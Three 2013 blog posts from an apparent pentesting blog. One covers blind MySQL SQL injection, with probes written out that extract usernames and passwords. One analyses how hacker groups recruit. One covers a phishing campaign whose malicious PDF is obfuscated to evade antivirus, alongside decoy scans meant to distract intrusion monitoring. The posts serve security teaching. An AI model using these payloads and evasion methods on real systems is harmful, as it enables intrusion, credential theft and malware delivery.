Thursday, 18 July 2013

THE LIFE OF AN INJECTION

[<MEGAPRIMER 1.0.7> LESS IS MORE <GREP> MYSQL>BLIND SQL INJECTION]

Going Blind and finding your way
An assignment is requested as follows. You are required to conduct a pentest on a client's simulated Research and Development lab environment. While being briefed, you get to interact with the network administrator, a Cisco expert and Snort Certified Professional who has set up the militarized test environment with state-of-the-art defensive mechanisms. Moreover, you learn that they recently installed a web application firewall. You are required to compromise the installation so that the organisation can secure itself against future risk exposures.
Deliverable: Own the box
ssvforensic labs: Tool kit for this operation, not limited to;
Case                 Undisclosed company Y
411 about the firm   ERP software development
Mission              Pita_Katikati_Yao
Objective            Pwn and own
RV choice            Kali Linux [Burp Suite/ZAP, SQL cheat-sheet, web shell, hosting, tcpdump & Firebug]
POC                  Samples below

SAMPLE OF THE THEORETICAL POC METHODOLOGY
The tactics and strategies used by a Shaolin disciple in combat are the intelligent application of principles generalised by some of the best warriors of the past.
This is synonymous with **Ancient Principles for Future Battlefields**, the BackTrack mantra. The below can be summarised as the five rules of thumb for any white hat, black hat or grey hat, not to forget our Red Hat buddies from 0days ago; the Oracle is listening.......

RULES OF THUMB

  1. Signal to the East, strike to the West;
  2. Avoid an opponent's strong points, strike the weak ones;
  3. Trick an opponent into advancing without success;
  4. If an opponent is strong, enter from the side; if weak, enter from the front;
  5. USE MINIMUM FORCE to neutralize maximum strength.
Layered Defence Approach adopted versus a potential threat via sql injection
SAMPLE OF THE THEORETICAL SETUP METHODOLOGY
After careful assessment (Rules 2 and 4), going for the web server was more logical than the other options, which were heavily monitored. To distract the technical team watching the systems, we install four custom VM setups (we only discuss two, for reasons known to us): one host-based and one on a "custom virtual network", to be used as decoys when running the automated nmap scan. We also deliberately do not limit nmap to a stealth (SYN) scan, and we set -p to 1-65500, the aim being to make the administrators pay more attention to the IPS and IDS (Rule 1). On one of the VMs we also create a cron job for a bash script that loops the nmap scan and other scans (Rule 3). The noise is the point: a repeated full-range scan is exactly what the Snort sensors will keep alerting on while the real work goes on elsewhere.
SAMPLE OF THE BLIND SQL INJECTION POC
Using Rule 5, a sample of the blind SQL injection probes used to own the box. The injection is blind: nothing from the database is echoed back, so every probe is a yes/no question answered only by whether the page loads normally (true) or not (false).
http://xxxxxxxxxxx/ and 1=1
"and 1=2" is a Boolean false and the page does not load normally; "and 1=1" is a Boolean true and the page loads. Getting both behaviours from the same parameter confirms the injection point.
The MySQL version: in a blind attack we test one character at a time with substring().
http://xxxxxxxxxxx/ and substring(@@version,1,1)=5
A true result means the major version is 5 (MySQL coerces the string '5' to the number 5 for the comparison).
Getting database tables and columns, we use limit 0,1:
http://xxxxxxxxxxx/ and (select 1 from mysql.table limit 0,1)=1
Here mysql.table stands for a guessed schema.table name. The sub-select returns at most one row, so the expression is true when the table exists and holds at least one row, and the page breaks (false) when the table does not exist. The same probe is repeated with further table and column names.
Pulling characters from the users table:
ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
The 0x3a is a colon, so the first row comes back as username:password. The ascii() comparison tests one character against a threshold; moving the threshold (a binary search over the ASCII range takes about seven probes per character) pins down the exact code, after which the position argument of substring() is incremented. When ">0" returns false we know we have reached the end of the string. We later run the collected codes through an ASCII converter to get the letters.

Conclusions
According to the OWASP Top 10 (2013), injection is the number one risk (A1) facing web applications. The illustration below shows injection flaws and their impact on the business.
As security analysts and penetration testers, we have a framework from OWASP as a baseline for testing (the OWASP Testing Guide), to help developers, testers and application security specialists understand how to efficiently and effectively test the security of web applications.
For application pentesters wanting to get their hands dirty, try Mutillidae and Burp Suite as your test environment, and the rest, as they say, is history. I wish to remind you that as a security analyst you should seek to provide an acceptable level of security for your client, emphasising that the word "secure" does not exist in our current world.
Special thanks: credits for reference to OWASP & Sun Tzu (Art of War), my de facto mentor.

Friday, 5 July 2013

Recruitment of Hackers

[<MEGAPRIMER 1.0.6.1> FRAUD <B>FRAUD RECRUITMENT>HACKER RECRUITMENT]
Getting a Job as a Hacker
An assignment is requested as follows: recently, multiple government sites in a certain region of our world have been victims of defacement and DDoS. Your job is first to understand how this online gang operates, with a view to infiltrating and dismantling the group. The C-level in organisation X needs an executive summary of how recruitment is carried out by these gangs and a rationale for what motivates this kind of illegal group.
Deliverable: Explain how hackers are recruited on the black market.
ssvforensic labs:Tool Kit for this operation not limited to;
Case                 Undisclosed company X
411 about the firm   Private contractor
Mission              home_and_away
Objective            Underground recruitment of hackers
RV choice            Kali Linux [Maltego CaseFile, Graph Search, IRC, Twitter, social networks, grep, Google]
POC                  Sample below
Sample of the POC on how three elements aid the recruitment process
For fraud to take place, three elements have to be present (the fraud triangle):
1. Rationalization >> 2. Perceived opportunity >> 3. Perceived pressure.
To understand this phenomenon, three levels of reasoning can be used:
1. Zero-order reasoning >> 2. First-order reasoning >> 3. Higher-order reasoning.
Our discussion is limited to first-order reasoning, in which we consider the conditions that directly affect the hacker. To do that, let us consider it with a visual aid.
With hackers, the greater the perceived opportunity or the more intense the pressure (mostly financial, or vice), the less rationalization it takes to motivate someone to commit fraud. Likewise, the more dishonest a perpetrator is, the less opportunity and/or pressure it takes to motivate fraud. It must be understood that hacking, in any of its forms, is fraud.
SAMPLE OF THE POC ON RECRUITMENT

How are the organisation and leadership of hackers or hacking legions created? Power is the single most important element that catalyses the organisation and recruitment of any hacking entity. How?

Max Weber (in the 1947 English edition of his work) defined power as the probability that a person can carry out his or her own will despite resistance. When a hack takes place, the conspirator has the desire to carry out his or her own will, to influence another person to act and do as the perpetrator wishes, regardless of resistance. Consider the diagram below on the recruitment process of hacktivist groups.
The effectiveness of the perpetrator in influencing a potential recruit depends on the susceptibility of the victim as well as on the perpetrator's ability to manipulate the various types of power. The figure is interactive, meaning that the more susceptible a victim is to the various types of power, the less effective the perpetrator has to be for recruitment to occur. Often, after the initial victim is recruited into the fraud scheme, that individual becomes a conspirator (in position A) and begins to influence other individuals to participate in the fraud.
Conclusions
In conclusion, as a security analyst, it is important to understand that fraud examination provides insights into the likelihood of hacking activities. As a security consultant, it is prudent to know who you are dealing with and how to set up countermeasures to mitigate security-related issues. A mere pentest only serves to inform your client of vulnerabilities; remember that risk assessment by any standard, be it COBIT, COSO, NIST or ISO, is a four- to six-tier process model. To my fellow security analysts: the Olympics are over, so wacheni mchezo, tufanye kazi mzuri (stop playing around, let's do good work).
Special thanks: credits to Prof. XYZ (Risk Analysis) & Sun Tzu (Art of War), my de facto mentor.

Fraud As A Service

[<MEGAPRIMER 1.0.6> FRAUD <A>SOCIAL ENGINEERING> SPEAR PHISHING]
Committing Fraud using Social Engineering
An assignment is requested as follows: conduct a risk assessment using passive, non-intrusive means and gain access to a Fortune 500 company within one week, so as to address the risk posed by fraud in a corporate environment.
Deliverable: Use theoretical and technical non-intrusive means in your POC.
Sample of how the problem was solved
Fraud is defined as the multifarious means which human ingenuity can devise, which are resorted to by one individual to get an advantage over another by false representations.
For fraud to happen, three elements have to be present:
1. Rationalization >> 2. Perceived opportunity >> 3. Perceived pressure
Fraudsters, aka hackers, will use systematic social engineering as per below.
ssvforensic labs: The tool kit for this operation, not limited to;
Use passive, non-intrusive means to gain access and leave no stone unturned
Case                 Fortune 500 company
411 about the firm   Fortune worth in excess of 2 billion dollars
Mission              Charles_Ponzi
Objective            Impact of pseudo-frauds with the advent of Fraud-As-A-Service (FAAS)
RV choice            Kali Linux [Maltego, Rapportive, Facebook, Total AV, rootkit, Jigsaw, Glassdoor]
POC                  Below
Sample Theoretical principle on Fraud in relation to social Engineering

Sample of the Technical detail using phishing techniques
The payload is encoded with shikata_ga_nai, 100 iterations.
This did not work against the latest signature-based proactive defence technologies. We later used PEScrambler and another undisclosed tool to obfuscate it further so as to bypass vendor AV signatures. PEScrambler is a tool that obfuscates Win32 binaries automatically. It can relocate portions of code and protect them with anti-disassembly code. It also defeats static program-flow analysis by re-routing all function calls through a central dispatcher function. We finally use Total AV to perform a multi-engine malware scan; a detection ratio of 0/47 against the major antivirus scanners is the desired outcome, and none of the top vendors' signatures detected the malicious PDF. Bear in mind that a multi-scanner result only says the sample evades those engines' signatures on the day of the scan; behavioural and reputation layers on the endpoint are a separate question.
Finally, use the transporter [sendmail] to send the package and hope your listener (the Metasploit multi/handler, or netcat) hears something nice; 7 times out of 10 it will, as shown below.
In conclusion, information is the new money. Fraud-As-A-Service (FAAS) is an organised scheme used by techno-savvy fraudsters to embezzle billions from companies. The three elements affected by non-cash frauds are a) inventory, b) securities and c) information.